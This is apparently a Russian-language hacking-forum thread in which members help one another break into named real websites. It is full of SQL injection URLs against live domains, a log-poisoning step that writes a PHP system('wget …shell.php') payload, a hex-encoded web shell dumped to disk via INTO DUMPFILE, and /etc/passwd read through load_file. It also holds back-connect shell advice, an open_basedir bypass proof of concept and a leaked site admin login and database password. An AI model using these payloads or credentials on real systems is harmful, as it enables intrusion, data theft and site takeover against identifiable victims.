Админы завтыкуют удалять.
Воше не мешало б создать отдельный топик на этот вопрос и наверно предыдущий.
Хоть и лоловский метод, но уже есть и версия мускула и путь!

Вопрос 1:
Как такое прыкрыть (рационально всмысле)!?

Вопрос 2:
Какие есть вариации каталога по умолчанию для выполнения cgi скриптов(и др. каталоги) у разных веб-серверов с компроментирующими даными ?
сgi-bin/test.pl - например , денвер.
результат - путь.

Ответ 1: фаервол.
Ответ 2: гугл. все не перечесть.

но уже есть и версия мускула и путь!
И ничего это не дает само по себе.

Привет, как произвести инъекцию что бы вытащить хоть какую то инфу т.к не получается (новичок пока) урл палить не буду но вот какая ошибка:

warning: implode() [function.implode]: Bad arguments. in /home/rryan/public_html/alumni/sites/all/modules/views/views.module on line 1961. user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '='' at line 1 query: SELECT count( DISTINCT(node.nid)) FROM node node LEFT JOIN node bio ON node.uid = bio.uid AND bio.type = 'uprofile' LEFT JOIN content_type_uprofile bio_node_data_field_year_graduated_or_last_ye ON bio.vid = bio_node_data_field_year_graduated_or_last_ye.vid LEFT JOIN content_type_uprofile bio_node_data_field_name ON bio.vid = bio_node_data_field_name.vid LEFT JOIN users_roles users_roles ON node.uid = users_roles.uid INNER JOIN users users ON node.uid = users.uid LEFT JOIN content_type_uprofile bio_node_data_field_full_name ON bio.vid = bio_node_data_field_full_name.vid INNER JOIN node_access na ON na.nid = node.nid WHERE (na.grant_view >= 1 AND ((na.gid = 0 AND na.realm = 'all') OR (na.gid = 1 AND na.realm = 'workflow_access') OR (na.gid = 0 AND na.realm = 'workflow_access_owner'))) AND ( (bio.status = '1') AND (bio_node_data_field_year_graduated_or_last_ye.fie ld_year_graduated_or_last_ye_value IN ('1')) AND (node.type IN ('uprofile')) AND (()) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '=') ) in /home/rryan/public_html/alumni/includes/database.mysql.inc on line 174. user warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '='' at line 1 query: SELECT DISTINCT(node.nid), bio_node_data_field_year_graduated_or_last_ye.fiel d_year_graduated_or_last_ye_value AS bio_node_data_field_year_graduated_or_last_ye_fiel d_year_graduated_or_last_ye_value, users.uid AS users_uid, bio.title AS bio_title, bio.changed AS bio_changed, bio_node_data_field_full_name.field_full_name_valu e AS bio_node_data_field_full_name_field_full_name_valu e, bio.nid AS bio_nid FROM node node LEFT JOIN node bio ON node.uid = bio.uid AND bio.type = 'uprofile' LEFT JOIN content_type_uprofile bio_node_data_field_year_graduated_or_last_ye ON bio.vid = bio_node_data_field_year_graduated_or_last_ye.vid LEFT JOIN content_type_uprofile bio_node_data_field_name ON bio.vid = bio_node_data_field_name.vid LEFT JOIN users_roles users_roles ON node.uid = users_roles.uid INNER JOIN users users ON node.uid = users.uid LEFT JOIN content_type_uprofile bio_node_data_field_full_name ON bio.vid = bio_node_data_field_full_name.vid INNER JOIN node_access na ON na.nid = node.nid WHERE (na.grant_view >= 1 AND ((na.gid = 0 AND na.realm = 'all') OR (na.gid = 1 AND na.realm = 'workflow_access') OR (na.gid = 0 AND na.realm = 'workflow_access_owner'))) AND ( (bio.status = '1') AND (bio_node_data_field_year_graduated_or_last_ye.fie ld_year_graduated_or_last_ye_value IN ('1')) AND (node.type IN ('uprofile')) AND (()) AND (.users_roles IN ('rid')) AND (3.node status '=') AND (1.users status '=') ) ORDER BY bio_node_data_field_year_graduated_or_last_ye_fiel d_year_graduated_or_last_ye_value ASC LIMIT 0, 26 in /home/rryan/public_html/alumni/includes/database.mysql.inc on line 174.

есть возможность инклюдить файл с логами. как туда записать свой код ? InetCrack`ом ?

Harvard, читай, все идеально расписано http://forum.antichat.ru/thread43966.html

daniel_1024, да ,попробуй замени : "User-Agent", своим шеллом. Для заливки полноценного шелла, отправь такой запрос <?php system('wget http://site.ru/shell.php'); ?>

http://www.znania.ru/dbxhigh.asp?id=1'
как узнать версию?
http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?

http://www.znania.ru/dbxhigh.asp?id=1'
как узнать версию?
http://www.znania.ru/dbxhigh.asp?id=1+or+1=version@@-- не работает. там фильтрация какая то или что?
во первых:
http://www.znania.ru/dbxhigh.asp?id=1+or+1=@@version
а во вторых
http://www.znania.ru/dbxhigh.asp?id=1+and+ascii(substring(@@version),1, 1)=53

После установки айфрейма и загрузки страницы с ним, браузер будет писать что-то вроде Sending request to iframelink.com. Внимательный админ это сразу заметит.
Есть способы скрытия обращения к странице, указанной в айфрейме?

Ответ 1: фаервол.
Ответ 2: гугл. все не перечесть.

И ничего это не дает само по себе.
вот тут ты и не прав!!! сбор данных знаеш что такое, ну вот!

во первых:
http://www.znania.ru/dbxhigh.asp?id=1+or+1=@@version
а во вторых
http://www.znania.ru/dbxhigh.asp?id=1+and+ascii(substring(@@version),1, 1)=53

не работает почему то

не работает почему то
http://www.znania.ru/dbxhigh.asp?id=1+AND+ascii%28substring%28%28select +table_name+from+information_schema.tables%29,1,1% 29%29%3E117

хмм.. Could not find file 'c:\windows\system32\inetsrv\information_schema.md b'.

']http://www.znania.ru/dbxhigh.asp?id=1+AND+ascii%28substring%28%28select +table_name+from+information_schema.tables%29,1,1% 29%29%3E117

хмм.. Could not find file 'c:\windows\system32\inetsrv\information_schema.md b'.

скажите, а где вы это все видите? у меня только вот это выводит:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '[primary].[Êîä] = 1 AND ascii(substring((select table_name from information_schema.tables),1,1 29)>117'. /dbxhigh.asp, line 37

скажите, а где вы это все видите? у меня только вот это выводит:

ты пустые поля убрал ?!?
типа SELECT +TABLE_NAME
з.ы select+....

Какие ascii(substring ?! И причём тут information_schema ? Это Microsoft Access если что.

http://www.ceylinco-insurance.com/products.php?id=1

поjaлуста , что мойно зделать ?

http://www.ceylinco-insurance.com/products.php?id=(select*from(select+name_const(ver sion(),1),name_const(version(),1))a)

Pashkela :

Спасибо , а как дальше ?

Или есть статя об етом методе ?

LokbatanLi,юзай поиск... Читай : http://forum.antichat.ru/thread43966.html https://forum.antichat.ru/thread104591.html

Pashkela
Каким способом ты раскрутил эту инъекцию? Как это делать без подбора полей и т.д.? Мб есть линк на статью?

В этой скуле если искать количество полей через group by, то это 12, а если union select, то при вводе 12 появляется ошибка. Почему?

ось линукс, имеется возможность выполнять системные команды. как закачать полноценный шелл? get и wget не работают...

curl, fetch

тренируюсь с блинд скулями в собсвенном скрипте.
1. нет нормальных статей по блинду
2. есть табла user с полем login и password

вот пример инжекта моего

http://localhost/index.php?id=1&act=news' and substring(version(),1,1)29=5+--+

помогите плиз состваить запроc на проверку 1-ого симвала логина или пасса. и дайти плиз ссылки на хорошие статьи

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

Помогите довести до ума

вообщето это не инклуд а iframe

http://extensis.cnrc.navy.mil/index.htm?content=http://google.com'

так что доводить нечего...

http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты?

http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=1+union+select+1,2,3,version(),5,6,7,8,9,1 0+limit+1,1

http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты?

http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,2,3,password,5,6,7,8,9,10+from+my sql.user

database(): od4
@@basedir: /usr/
@@tmpdir: /tmp/
version(): 5.0.77
user(): root@localhost <====
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu

-----------------------------------------
File [/etc/passwd] size: - 1759 bytes
-----------------------------------------

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/

...
-----------------------------------------
File [/etc/httpd/conf/httpd.conf] size: - 39844 bytes
-----------------------------------------

#
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.2/> for detailed inf

...

Что значет есле при выходе SQL injection в низу написанно
[XT SQL Error]
что это??
и ище очень часто я встречяюсь с этим
типа You have an error in your SQL syntax;...................

[TEP STOP]
и разкрутить неразу не удалось.. что это может быть?
HELP !"

вроде второй раз уже спрашиваешь, дай живой пример, какая тебе разница, если сам раскрутить не можешь, и телепатировать не придется

Pashkela вот один сайт.. прост не хотел палить ну другова варианта нет
_http://piskurek.camping-profi.de/index.php?cat=c189_Kabeltrommeln-und-Stromeinspeisung.html&page=-2%27

Pashkela вот один сайт.. прост не хотел палить ну другова варианта нет
_http://piskurek.camping-profi.de/index.php?cat=c189_Kabeltrommeln-und-Stromeinspeisung.html&page=-2%27
Это почти безнадежно, там SQLi в лимите. Насколько знаю в таких случаях возможно использование только into outfile и то если будут права и будеш знать полный путь.
Ну а [XT SQL Error] это типа предупреждение вшитое самими разработчиками xt:Commerce.

помояите залить шелл поjaлуста..

http://ens.ewi.tudelft.nl/People/bio.php?id=-1+union+select+0,1,2,3,0x3C3F696E636C75646528245F4 745545B22636D64225D293B3F3E,5,6,7,8,9,10,11,12+fro m+mysql.user+INTO+DUMPFILE+%27/var/www/enswww/11.php%27

http://ens.ewi.tudelft.nl/People/bio.php?id=-1+union+select+0,1,2,3,0x3C3F696E636C75646528245F4 745545B22636D64225D293B3F3E,5,6,7,8,9,10,11,12+fro m+mysql.user+INTO+DUMPFILE+%27/var/www/enswww/People/11.php%27

не получаеться..

2 LokbatanLi
там меджики.

2 LokbatanLi
там меджики.

ну на самом деле можно попробовать еще вот этот способ...

http://forum.antichat.ru/threadnav43966-4-10.html

http://ens.ewi.tudelft.nl/People/bio.php?id=-1+union+select+0,1,2,3,load_file(0x2f6574632f70617 3737764),5,6,7,8,9,10,11,12

неужели там хеши?

Почему user() иногда возвращает кавычку?

'@localhost

ну на самом деле можно попробовать еще вот этот способ...

http://forum.antichat.ru/threadnav43966-4-10.html

нет не получаеться

нет не получаеться
покажи как ты пробовал?

даje не моq пробовать..

Почему user() иногда возвращает кавычку?
Выложи ссыль.

Выложи ссыль.

http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database (),version())--

http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database (),version())--
Здесь юзер valesby@localhost и никакой кавычки. С чего ты взял, что там кавычка?

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns
Здесь просто имя юзера после локалхост пишет.

Все, разобрался, это value в кавычках. Спасибо.

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/common/common_scripts.php on line 26
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@localhost:valesby:5.0.90' at line 4
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/valesby/data/www/vales.by/catalog.php on line 155
The used SELECT statements have a different number of columns
Здесь просто имя юзера после локалхост пишет.
Улыбнуло :D

Поясню: на странице идет два запроса. В первом - SQL-инъекция, дальше идет второй запрос, в котором используются данные от первого. MySQL ругается на символ '@', поэтому показывает только от этого символа.

Делаем запрос:
http://www.vales.by/catalog.php?action=show_object&id=109+union+select+hex(concat_ws(0x3a,user(),data base(),version()))
Получаем:
76616C65736279406C6F63616C686F73743A76616C65736279 3A352E302E3930
Что в HEX:
valesby@localhost:valesby:5.0.90
Тоесть
имя_юзера:БД:версия

Проявляем смекалку и нестандартное мышление, товарищи... :)

там phpbb - форум :D
прав не хватает... :( шелл не залить

2 mailbrush:

http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+ user()),floor(rand(0)*2))+from+information_schema. tables+group+by+2)a)

http://www.zed.ua/en/index.php?id=-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20table_name%20from%20informa tion_schema.tables%20limit%2041,1),1,64),floor(ran d(0)*2)))--

а дальше как видеть колонки в таблице ua_menu_item1 ??

зделаю так

http://www.zed.ua/en/index.php?id=-1%20or%20(select%20count(*)from(select%201%20union %20select%202%20union%20select%203)x%20group%20by% 20concat(mid((select%20column_name%20from%20inform ation_schema.columns%20where%20table_name=0x75615F 6D656E755F6974656D31%20limit%202,1),1,64),floor(ra nd(0)*2)))--

не получаеться..помоqите поjaлуста

Потому что ua_menu_item1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..

http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((s elect(column_name)from(information_schema.columns( where)table_name=0x75615f6d656e755f6974656d)limit+ 0,1),floor(rand(0)*2))from(information_schema.tabl es)GROUP+BY+2)

http://diktatu.net/index.php?id=34&i_id=1625
Cкажите, это php-inj?

http://diktatu.net/index.php?id=34&i_id=1625
Cкажите, это php-inj?
нет..
http://diktatu.net/index.php?id=-1+union+select+1,2,%28select+concat%280x7e,0x27,gr oup_concat%28table_name%29,0x27,0x7e%29+from+infor mation_schema.tables+Where+table_schema=0x64696B74 617430305F64696B74617475%29--

На UcoZе есть XSS?

Потому что ua_menu_item1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..

http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((s elect(column_name)from(information_schema.columns( where)table_name=0x75615f6d656e755f6974656d)limit+ 0,1),floor(rand(0)*2))from(information_schema.tabl es)GROUP+BY+2)

не получилось

http://www.zed.ua/en/index.php?id=(select+1+from+(select+count(0),conca t((select+column_name+from+information_schema.colu mns+where+table_name=0x75615f6d656e755f6974656d+li mit+0,1),floor(rand(0)*2))+from+information_schema .columns+group+by+2+limit+0,1)a)

2 mailbrush:

http://www.vales.by/catalog.php?action=show_object&id=(select+1+from+(select+count(0),concat((select+ user()),floor(rand(0)*2))+from+information_schema. tables+group+by+2)a)

http://www.vales.by/catalog.php?action=show_object&id=-1+union+select+unhex(hex(concat_ws(0x3a,user(),use r(),database(),version())))+--+

@localhost:valesby@localhost:valesby:5.0.90

2 Ctacok:

Ну тогда еще объясни плз нахрена вы всегда перед -- плюсик ставите, это что, магия какая-то особенная? ))

2 Ctacok:

Ну тогда еще объясни плз нахрена вы всегда перед -- плюсик ставите, это что, магия какая-то особенная? ))
Хоть ты мне и писал как-то давно что не обязательно, но уж от привычки сложно отказаться, да и рука сама тянеться, и не всегда кстате срабатывает без +--+, ну ты понел.

Знаю уже задолбал своими вопросами, но кому не трудно ответьте.
Вопрос состоит в том, как залить шелл?
Вот есть у меня скуля:
http://www.shokoladka.ru/info.php?id=-177%27+union+select+1,2,3,4,5,6,7,8,9+--+.
Напишите как можно залить сюда шелл.
И скажите после заливки шелла я смогу полностью менять исходник страницы и т.д.?
Пробовал делать как написано в статье "SQL injection полный FAQ", но что-то не получается :(

Знаю уже задолбал своими вопросами, но кому не трудно ответьте.
Вопрос состоит в том, как залить шелл?
Вот есть у меня скуля:
.
Напишите как можно залить сюда шелл.
И скажите после заливки шелла я смогу полностью менять исходник страницы и т.д.?
Пробовал делать как написано в статье "SQL injection полный FAQ", но что-то не получается :(

покажи как делал.

достаешь из базы пасс и логин от админки - заходишь и там смотришь по обстоятельствам.

CyberHunter, шелл ты сможешь залить через админку, фтп или исполнить инклуд. Думаю, что в твоем случае нужно раскрутить твою скулю до вида логин;пароль.
После того, как зайдешь в админку, шелл сможешь залить, анпример, через систему баннеров, аватаров и т.д. Если сервер не захочет исполнять пхп файл, сделай расширение, например .php.jpg%00 (с нулевым байтом)

например .php.jpg%00 \

что за чудо-конструкция? :)

:.']что за чудо-конструкция? :)

это защита от дурака. Специально так.

CyberHunter, шелл ты сможешь залить через админку, фтп или исполнить инклуд. Думаю, что в твоем случае нужно раскрутить твою скулю до вида логин;пароль.
После того, как зайдешь в админку, шелл сможешь залить, анпример, через систему баннеров, аватаров и т.д. Если сервер не захочет исполнять пхп файл, сделай расширение, например .php.jpg%00 (с нулевым байтом)
Ага, и сервер магическим образом интерпретирует .jpg-файл как PHP-код? :D

mailbrush,

на сколько я знаю, именна эта конструкция применялась пр загрузке шелла на форум vbulletin с VBSEO( если аватарки лежали не в БД)

Знаю уже задолбал своими вопросами, но кому не трудно ответьте.
Вопрос состоит в том, как залить шелл?
Вот есть у меня скуля:
.
Напишите как можно залить сюда шелл.
И скажите после заливки шелла я смогу полностью менять исходник страницы и т.д.?
Пробовал делать как написано в статье "SQL injection полный FAQ", но что-то не получается :(

насколько мне кажется там сложновато шелл залить, можно прочитать конфиги, но залить....нет папок доступных на запись, просто их нет

http://i071.radikal.ru/1003/af/314cba9c6f79.jpg (http://www.radikal.ru)

PS: allow_url_include= Off к сожалению, но php-код можно выполнить любой (практически)

Ну может у кого есть уже залитый шелл и не жалко показать :)

Потому что ua_menu_item1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..

http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((s elect(column_name)from(information_schema.columns( where)table_name=0x75615f6d656e755f6974656d)limit+ 0,1),floor(rand(0)*2))from(information_schema.tabl es)GROUP+BY+2)


не получилось
Конечно не получилось, там где where, нужно было развенуть дужки. Ничего не хочет думать молодёжь...

Ну может у кого есть уже залитый шелл и не жалко показать :)


<?php

$host="localhost";
$db_login="ksh";
$db_password="mysql00";
$database="shokoladka";
@mysql_connect($host, $db_login, $db_password) or die("Не могу подсоединиться к серверу!");
@mysql_select_db($database) or die("Не могу выбрать базу!");

?>



http://www.shokoladka.ru/myadmin/

Pashkela спасибо большое.
Но я имел ввиду, чтобы шелл уже был залит на сайт :)

А твой скрипт насколько я понял - это и есть веб-шелл, который нужно заливать, после чего получаешь управление над сервером? Правильно?

Pashkela на соседнем сайте есть папки где запись разрешена, попробуй туда залить, или тамже через админку дле... лень там копатся (:

http://www.autonarod.ru/admin.php
autonarod:churka1

mailbrush,

на сколько я знаю, именна эта конструкция применялась пр загрузке шелла на форум vbulletin с VBSEO( если аватарки лежали не в БД)
Во-первых - это был инклуд, во-вторых - там была конструкция file.gif%00.php, из-за которой интерпретатор думал, что ему передается php файл, а функция инклуда обрезала его и инклудила картинку - это совсем другой случай. А то, что показал ты - это вообще бред. Зачем ставить нулл-байт в конце строки? Какой с него толк?

Pashkela на соседнем сайте есть папки где запись разрешена, попробуй туда залить, или тамже через админку дле... лень там копатся (:

http://www.autonarod.ru/admin.php
autonarod:churka1


)) пусть сам уже дальше думает) там не один сайт по reverse ip

mailbrush,

на сколько я знаю, именна эта конструкция применялась пр загрузке шелла на форум vbulletin с VBSEO( если аватарки лежали не в БД)


Ты проверял хоть? Зачем говорить от балды? Вообще-то в vbulletin фильтр стоит нормальный на загрузку файлов, я с ним копался как-то...
К тому же, для инклуда достаточно картинку залить, зачем эта конструкция, я не понял? Если б она прокатывала, не нужно было бы никаких инклудов.
Там кстати не катит простое добавление пхп-кода в картинку, с ним пошаманить нужно.

)) пусть сам уже дальше думает) там не один сайт по reverse ip
Pashkela, ну допустим есть доступ для записи, а что заливать? какой скрипт? Видел в избранном WSО(веб-шелл), на что-то типа этого заливать?
И куда заливать? Как писали, через поля для баннеров, картинок и т.д.?

Root-access, там было два вида инклуда картинки. Один - с $_GET['vbseoembedd']=1, когда в параметре достаточно было поставить файл на инклуд, как он работал, с любым расширением. В более новых версиях эту багу прикрыли, проверяя расширение на .php, но и тут был выход - функция, которой они проверяли расширение не пропускала нулбайт, тобишь последними символами она считала .php, и сценарий шёл дальше - include() инклудила файл, но уже обрезав расширение. А пост jecka3000 вообще никакого отношения к этому не имеет. И еще, ты так и не ответил на мой вопрос, jecka3000, зачем нуллбайт в конце строки?

Там кстати не катит простое добавление пхп-кода в картинку, с ним пошаманить нужно.

спрашивал тут както об этом, никто тогда не ответил) оно его вырезает, как обходил ?
зы кстати при загрузке не аватары а фотографии такого нету.

подскажите плиз,
есть шелл на фряхе 7.2, нет доступа на папки ниже /public_html/
как добраться до "командной строки" ?
пробовал Execute, Binding port, Back connection на WSO,r57,c99 (ип прямой, на своём серваке всё работает)
есть мысли как победить?

залить бинарный бекконект или юзать ту версию WSO, где есть и С и Perl-бекконект (да-да, oRb зря удалил в последующих версиях С, как показывает практика), или рутать из веба

https://forum.antichat.net/thread156224.html

не могу раскрутит скул точно есть, может поможете?
пххп://www.stockhouse.com/shfn/article.asp?asp=1&aord=748654208&edtID=18744'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--

залить бинарный бекконект или юзать ту версию WSO, где есть и С и Perl-бекконект (да-да, oRb зря удалил в последующих версиях С, как показывает практика), или рутать из веба
https://forum.antichat.net/thread156224.html

пробовал и С и Perl
по поводу бинарника и "рутать из веба" - всё равно их надо запустить как то, в этом вся и загвоздка у меня.
Ещё мысли есть?

всё равно их надо запустить как то

в WSO вообще-то console есть

её пробовал в первую очередь,
так же пытался на AluCaR shell и Locus7Shell
в Locus7Shell есть альтернативные методы выполненич команд, но и они не сработали

safemode=on?

http://www.theamazingmaid.com/microcms-admin-home.php
Случайно нашел. Это пхп-инъекция? Вот что в ошибке:
Warning: include(micro_cms_files/config.php) [function.include]: failed to open stream: No such file or directory in /home/theamazi/public_html/microcms-admin-home.php on line 2

Warning: include() [function.include]: Failed opening 'micro_cms_files/config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/theamazi/public_html/microcms-admin-home.php on line 2

Fatal error: Call to undefined function microcms_check_admin_login() in /home/theamazi/public_html/microcms-admin-home.php on line 3

safemode=on?
Safe mode: OFF

CyberHunter
Нет. это просто ошибка - нет файла config.php. Можешь поискать каталог install/ - может он есть и даст тебе установить эту самую cms. Саму БД при этом вероятно придется указать с другого хоста.

Но, судя по твоему вопросу, тебе это будет не просто.

Не подскажите, почему
http://www.asteroid.ru/user_view.phtml?2034/2/17.phtml[///...///]
Когда вставляю 4036 слешей, то они не отображаются, а когда 4037 то отображаются, да и вообще почему не пашет инклуд? :) Какие могут быть причины? Из за абсолютного пути?
На счёт этого поста?
http://forum.antichat.ru/showpost.php?p=1023030&postcount=16
Где собственно последовательность?)) И если на линухе 1к символов с копейками, и на Linux 4065, то если ставить допустим 5к символов, то сработает в любом случае и там и там? или сть какие правила?

зы. Я хочу понять как это работает. На указанный сайт мне плевать.

us

http://www.asteroid.ru/user_view.phtml?2034/2/17


там и так по умолчанию нужное тебе расширение добавляется, чего ты там отрезать хочешь?

Есть ли рабочие методы обхода safe-mode для Apache+PHP/5.2.12+Freebsd 8 ?
Если да, то какие?))

session.save_path safe_mode and open_basedir bypass

EXAMPLES:

1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")

The main problem came when we use multiple ';' character and when we will
create fake directory structure to reduce '../'.

Proof of Concept:
0. Create directories:

/humhum

and

/byp

1. set open_basedir = /byp
2. create test.php
{
session_save_path("/humhum");
session_start();
}
3. php test.php

Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on
line 3
4. subdir.php
{
mkdir("puf");
mkdir(";a");
}
5. php subdir.php
6. cd puf
7. create byp.php
{

session_save_path(";;/byp/;a/../../humhum");
session_start();

}
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016

The main problem is located in session.c. PHP doesn't check, that we have
used next ';' after first. Creating fake directory structure

mkdir ';a'
mkdir '../;a'

we can reduce directory level using '../' .

Господа, помогите подобрать столбцы, немогу разобраться
http://www.orderflowers.co.il/products.php?cid=49%20%20and(1=1)
либо:
_http://www.orderflowers.co.il/products.php?cid=49+and+(1,1)=(select+*+from+(sele ct+name_const(version(),1),name_const(version(),1) )eba%20)
Duplicate column name '5.0.77'

1. http://www.orderflowers.co.il/products.php?cid=49 order by 13 --

2.http://www.orderflowers.co.il/products.php?cid=49 and 1 = 0 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database ()),7,8,9,10,11,12,13 --

шелл не залить, админку не нашёл, картон 2 штуки и то тестовые) хех)

2 pashkela: тот метод - особый случай. но меня не сработал ниразу..

Подскажите, вот что сегодня ношел:
http://www.federationpress.com.au/journals/abstract.asp?id=144'
Я так понял, что это MS Acces. Прочитал статью о таких инъекциях - ничего не смог сделать :(
Вот еще такая же:
http://www.etradesman.com.au/tradesman/tradesman.asp?id=144'
Как быть с такими?

И еще хотел спросить что это такое?
http://www.startdreams.com.au/LearnAboutMoney/KB_Content.aspx?section=KB_MB&id=144'
Можно ли провести инъекцию при такой ошибке?

нет это не инъекция, нельзя

нет это не инъекция, нельзя
серьезно ?
http://www.etradesman.com.au/tradesman/tradesman.asp?id=144+union+select+1+from+news

нет это не инъекция, нельзя
Ну а в первых двух?

короче есть скуль. вывожу все колонки - показывает все кроме password, хотя она существует.
вопрос: почему? и где пароли?

может там пусто ?)

Может ли оказаться так что небудет принтабельного поля?
http://www.zckc.com.tw/products.php?cID=49%20union%20select%201,version() ,3%20--

Может ли оказаться так что небудет принтабельного поля?
http://www.zckc.com.tw/products.php?cID=49%20union%20select%201,version() ,3%20--
Там не в этом дело.
http://www.zckc.com.tw/products.php?cID=49+and+row(1,1)%3E(select+count(* ),concat((select+version()),0x3a,floor(rand()*2))+ x+from+(select+1+union+select+2)a+group+by+x+limit +1)--
MySQL Error:Duplicate entry '4.1.22-community-nt:1' for key 1

может там пусто ?)
+100500
действительно пароли оказались только у нескольких пользователей из сотен или тысяч. и все в открытом виде гыыы.

http://www.klipart.ru/package.php?id=symmetricspiders'
дошел до 50 столбцов и ничего. :(

Darren!
_http://www.zckc.com.tw/products-cont.php?Key=-11+union+select+2,3,4,5,6,admin.*,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25+from+admin--+_http://www.zckc.com.tw/products-cont.php?Key=-11+union+select+2,3,4,5,6,7,admin.*,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25+from+admin--+Ы_Ы

Почему может быть так:

xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 %20--&lid=2&mnID=12&pageNum_getCategoryProducts=1

при 24 пишет что неправильное кол-во столбцов
а при 25 You have an error in your SQL syntax; check the manual that corresponds for the right syntax to use near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 -' at line 9


т.е. столбцов 25,но страницу же мне не выводит для вывода


пробую писать без хвоста, т.е. просто
xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 %20--

тогда вообще выводит обычную страницу даже при постановке id=49'
Как быть?

Почему может быть так:

xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 %20--&lid=2&mnID=12&pageNum_getCategoryProducts=1

при 24 пишет что неправильное кол-во столбцов
а при 25 You have an error in your SQL syntax; check the manual that corresponds for the right syntax to use near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 -' at line 9


т.е. столбцов 25,но страницу же мне не выводит для вывода


пробую писать без хвоста, т.е. просто
xxxx.com/order.php?id=49%20union%20select%201,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 %20--

тогда вообще выводит обычную страницу даже при постановке id=49'
Как быть?

Вопрос №5 Подбираю столбцы ордером пишет(допустим) 2, делаю запрос union+select+1,2 ничего не выводит (выводит ошибку)
Первое что нужно сделать в этом случае. проверить версию базы, например так:
site.com/index.php?id=1+and+substring(version(),1,1)=3
site.com/index.php?id=1+and+substring(version(),1,1)=4
site.com/index.php?id=1+and+substring(version(),1,1)=5

Если оказалось, что версия третья, то неудивительно. что вывода нет, оператор union введён с четвётой версии mysql. B этом случае читаем статьи по проведению инъекций в 3 ветке

Если версия >=4 . или мы видим ошибку different number of columns (https://forum.antichat.ru/threadnav43966-8-10.html) это вовсе не означает, что вывода не будет.
Вероятность найти вывод всё равно остаётся. По этой теме идём читать сюда:
different number of columns
с поста 79 и вниз со всеми комментариями

понял

Ну может у кого есть уже залитый шелл и не жалко показать

Ну может у кого есть уже залитый шелл и не жалко показать


что?

что?
Залитый шелл :)

помогите со скриптом для перехвата пост запроса))

CyberHunter нет, всё равно не выводится, хочу понять что именно я не так делаю

http://www.cggeorgallis.com/products.php?cid=49%20union%20select%201,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25%20--&lid=2&mnID=12&pageNum_getCategoryProducts=1


